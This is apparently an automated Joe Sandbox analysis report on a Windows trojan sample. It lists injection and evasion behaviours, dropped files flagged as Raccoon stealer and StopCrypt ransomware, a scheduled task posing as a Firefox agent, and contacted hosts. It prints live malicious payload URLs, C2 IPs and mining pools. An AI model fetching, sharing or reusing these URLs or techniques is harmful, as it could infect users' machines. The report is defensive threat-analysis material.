signatures 35->111 101 Multi AV Scanner detection for dropped file 38->101 103 Machine Learning detection for dropped file 38->103 105 Injects a PE file into a foreign processes 38->105 45 53DC.exe 38->45         started        107 Antivirus detection for dropped file 40->107 109 Sample uses process hollowing technique 40->109 48 FD6B.exe 40->48         started        63 C:\Users\user\AppData\Local\...\bzxmernq.exe, PE32 42->63 dropped 50 cmd.exe 42->50         started        53 cmd.exe 42->53         started        55 WerFault.exe 3 10 42->55         started        signatures15 process16 file17 129 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 45->129 131 Maps a DLL or memory area into another process 45->131 133 Checks if the current machine is a virtual machine (disk enumeration) 45->133 135 Creates a thread in another existing process (thread injection) 45->135 61 C:\Windows\SysWOW64\...\bzxmernq.exe (copy), PE32 50->61 dropped 57 conhost.exe 50->57         started        59 conhost.exe 53->59         started        signatures18 process19

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      9ro85QVN0F.exe37%VirustotalBrowse
                      9ro85QVN0F.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\FD6B.exe100%AviraHEUR/AGEN.1211353
                      C:\Users\user\AppData\Local\Temp\bzxmernq.exe100%AviraTR/Crypt.XPACK.Gen
                      C:\Users\user\AppData\Local\Temp\D54.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\iscgwer100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\656C.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\E6C4.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\F4CF.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\53A8.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\14F6.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\53DC.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\FE11.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\433C.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\411E.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\27E3.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\7480.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\FD6B.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\bzxmernq.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\411E.exe46%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\411E.exe77%ReversingLabsWin32.Trojan.Raccoon
                      C:\Users\user\AppData\Local\Temp\433C.exe34%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\433C.exe77%ReversingLabsWin32.Ransomware.StopCrypt
                      C:\Users\user\AppData\Local\Temp\53A8.exe50%ReversingLabsWin32.Infostealer.Generic
                      C:\Users\user\AppData\Local\Temp\53DC.exe47%ReversingLabsWin32.Trojan.DiskWriter
                      C:\Users\user\AppData\Local\Temp\656C.exe28%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D54.exe29%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\D54.exe81%ReversingLabsWin32.Trojan.Raccrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      22.0.53DC.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.0.53DC.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.iscgwer.5615a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.0.FD6B.exe.cf0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      22.0.53DC.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.9ro85QVN0F.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.0.iscgwer.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.0.iscgwer.400000.3.unpack100%AviraHEUR/AGEN.1123244Download File
                      17.0.iscgwer.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.0.iscgwer.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.0.53DC.exe.400000.3.unpack100%AviraHEUR/AGEN.1123244Download File
                      20.2.53DC.exe.6315a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.0.iscgwer.400000.2.unpack100%AviraHEUR/AGEN.1123244Download File
                      42.0.FD6B.exe.1a0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      22.2.53DC.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.0.FD6B.exe.1a0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                      19.2.411E.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.3.E6C4.exe.680000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      19.0.411E.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.0.iscgwer.400000.1.unpack100%AviraHEUR/AGEN.1123244Download File
                      25.2.F4CF.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      25.3.F4CF.exe.780000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      26.2.FD6B.exe.cf0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      26.0.FD6B.exe.cf0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      19.3.411E.exe.510000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.0.FD6B.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      22.0.53DC.exe.400000.1.unpack100%AviraHEUR/AGEN.1123244Download File
                      19.0.411E.exe.500e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.1.9ro85QVN0F.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.0.iscgwer.400000.0.unpack100%AviraHEUR/AGEN.1123244Download File
                      24.2.E6C4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.0.FD6B.exe.cf0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      42.2.FD6B.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      25.2.F4CF.exe.650e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      22.0.53DC.exe.400000.0.unpack100%AviraHEUR/AGEN.1123244Download File
                      24.2.E6C4.exe.660e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      22.1.53DC.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.1.iscgwer.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.9ro85QVN0F.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.0.411E.exe.500e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.0.53DC.exe.400000.2.unpack100%AviraHEUR/AGEN.1123244Download File
                      0.2.9ro85QVN0F.exe.6315a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.411E.exe.500e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.0.411E.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.9ro85QVN0F.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.0.FD6B.exe.1a0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      1.0.9ro85QVN0F.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.iscgwer.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.0.FD6B.exe.cf0000.1.unpack100%AviraHEUR/AGEN.1211353Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://185.7.214.171:8080/6.php100%URL Reputationmalware
                      http://host-data-coin-11.com/0%URL Reputationsafe
                      http://data-host-coin-8.com/files/6961_1642089187_2359.exe13%VirustotalBrowse
                      http://data-host-coin-8.com/files/6961_1642089187_2359.exe100%Avira URL Cloudmalware
                      http://81.163.30.181/2.exe1%VirustotalBrowse
                      http://81.163.30.181/2.exe100%Avira URL Cloudmalware
                      http://81.163.30.181/101.exe0%Avira URL Cloudsafe
                      http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                      http://data-host-coin-8.com/files/8474_1641976243_3082.exe16%VirustotalBrowse
                      http://data-host-coin-8.com/files/8474_1641976243_3082.exe100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://unicupload.top/install5.exe100%URL Reputationphishing
                      http://81.163.30.181/1.exe100%Avira URL Cloudmalware
                      http://privacy-tools-for-you-780.com/downloads/toolspab3.exe100%Avira URL Cloudmalware
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      http://data-host-coin-8.com/files/7729_1642101604_1835.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                      https://dynamic.t0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://81.163.30.181/11.msi0%Avira URL Cloudsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      http://81.163.30.181/6236.exe100%Avira URL Cloudmalware
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      pool-fr.supportxmr.com
                      		37.187.95.110
                      		truefalse
                        		high
                        unicupload.top
                        		54.38.220.85
                        		truefalse
                          		high
                          host-data-coin-11.com
                          		8.209.70.0
                          		truefalse
                            		high
                            cdn.discordapp.com
                            		162.159.130.233
                            		truefalse
                              		high
                              privacy-tools-for-you-780.com
                              		8.209.70.0
                              		truefalse
                                		high
                                goo.su
                                		172.67.139.105
                                		truefalse
                                  		high
                                  transfer.sh
                                  		144.76.136.153
                                  		truefalse
                                    		high
                                    api.telegram.org
                                    		149.154.167.220
                                    		truefalse
                                      		high
                                      data-host-coin-8.com
                                      		8.209.70.0
                                      		truefalse
                                        		high
                                        a0621686.xsph.ru
                                        		141.8.192.193
                                        		truefalse
                                          		high
                                          pool.supportxmr.com
                                          		unknown
                                          		unknownfalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://185.7.214.171:8080/6.phptrue
                                            • URL Reputation: malware
                                            		unknown
                                            http://host-data-coin-11.com/false
                                            • URL Reputation: safe
                                            		unknown
                                            http://data-host-coin-8.com/files/6961_1642089187_2359.exetrue
                                            • 13%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://81.163.30.181/2.exetrue
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://81.163.30.181/101.exetrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://data-host-coin-8.com/game.exefalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://data-host-coin-8.com/files/8474_1641976243_3082.exetrue
                                            • 16%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://unicupload.top/install5.exetrue
                                            • URL Reputation: phishing
                                            		unknown
                                            http://81.163.30.181/1.exetrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://privacy-tools-for-you-780.com/downloads/toolspab3.exetrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://data-host-coin-8.com/files/7729_1642101604_1835.exetrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://81.163.30.181/11.msitrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://81.163.30.181/6236.exetrue
                                            • Avira URL Cloud: malware
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmpfalse
                                              		high
                                              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpfalse
                                                		high
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308357030.0000023970047000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308963740.000002397004E000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000006.00000002.308935923.0000023970042000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308377033.0000023970041000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000003.308306128.000002397005C000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000006.00000002.308935923.0000023970042000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308377033.0000023970041000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.bingmapsportal.comsvchost.exe, 00000006.00000002.308807021.0000023970013000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://api.ip.sb/ipFD6B.exe, 0000001A.00000002.474578999.0000000004111000.00000004.00000001.sdmp, FD6B.exe, 0000001A.00000002.474770371.0000000004281000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000006.00000003.308371145.0000023970045000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000006.00000003.308241819.0000023970067000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309062464.0000023970069000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000006.00000003.308371145.0000023970045000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000006.00000003.308349628.0000023970057000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309009579.0000023970058000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001D.00000003.434050256.000001A704395000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.434111178.000001A704802000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308807021.0000023970013000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://%s.xboxlive.comsvchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		low
                                                                                    https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308357030.0000023970047000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308963740.000002397004E000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000006.00000003.308349628.0000023970057000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309009579.0000023970058000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://dynamic.tsvchost.exe, 00000006.00000002.308963740.000002397004E000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://disneyplus.com/legal.svchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000006.00000002.308878855.0000023970029000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000006.00000003.308349628.0000023970057000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309009579.0000023970058000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://activity.windows.comsvchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://help.disneyplus.com.svchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://%s.dnet.xboxlive.comsvchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		low
                                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.308306128.000002397005C000.00000004.00000001.sdmpfalse
                                                                                                            		high

                                                                                                            Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            188.166.28.199
                                                                                                            		unknownNetherlands
                                                                                                            		14061DIGITALOCEAN-ASNUStrue
                                                                                                            172.67.139.105
                                                                                                            		goo.suUnited States
                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                            8.209.70.0
                                                                                                            		host-data-coin-11.comSingapore
                                                                                                            		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                            54.38.220.85
                                                                                                            		unicupload.topFrance
                                                                                                            		16276OVHFRfalse
                                                                                                            144.76.136.153
                                                                                                            		transfer.shGermany
                                                                                                            		24940HETZNER-ASDEfalse
                                                                                                            162.159.130.233
                                                                                                            		cdn.discordapp.comUnited States
                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                            81.163.30.181
                                                                                                            		unknownRussian Federation
                                                                                                            		58303IR-RASANAPISHTAZIRtrue
                                                                                                            185.233.81.115
                                                                                                            		unknownRussian Federation
                                                                                                            		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                            185.7.214.171
                                                                                                            		unknownFrance
                                                                                                            		42652DELUNETDEtrue
                                                                                                            185.186.142.166
                                                                                                            		unknownRussian Federation
                                                                                                            		204490ASKONTELRUtrue

                                                                                                            Private

                                                                                                            IP
                                                                                                            192.168.2.1

                                                                                                            General Information

                                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                            Analysis ID:553220
                                                                                                            Start date:14.01.2022
                                                                                                            Start time:13:57:19
                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                            Overall analysis duration:0h 14m 38s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:light
                                                                                                            Sample file name:9ro85QVN0F.exe
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                            Number of analysed new started processes analysed:43
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:2
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • HDC enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.evad.mine.winEXE@41/30@88/11
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HDC Information:
                                                                                                            • Successful, ratio: 23.9% (good quality ratio 15.8%)
                                                                                                            • Quality average: 49.2%
                                                                                                            • Quality standard deviation: 40.4%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 56%
                                                                                                            • Number of executed functions: 0
                                                                                                            • Number of non-executed functions: 0
                                                                                                            Cookbook Comments:
                                                                                                            • Adjust boot time
                                                                                                            • Enable AMSI
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            Warnings:
                                                                                                            Show All
                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                            • TCP Packets have been reduced to 100
                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 23.211.4.86, 23.211.4.250, 23.211.5.146, 13.89.179.12, 20.54.110.249, 40.91.112.76
                                                                                                            • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, e4578.dscb.akamaiedge.net, patmushta.info, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, storeedgefd.xbetservices.akadns.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iplogger.org, e1723.g.akamaiedge.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            13:58:53Task SchedulerRun new task: Firefox Default Browser Agent D5FEEC786DC5C0BA path: C:\Users\user\AppData\Roaming\iscgwer
                                                                                                            13:59:10API Interceptor1x Sleep call for process: E6C4.exe modified
                                                                                                            13:59:12API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                            13:59:18API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                            13:59:22API Interceptor7x Sleep call for process: svchost.exe modified
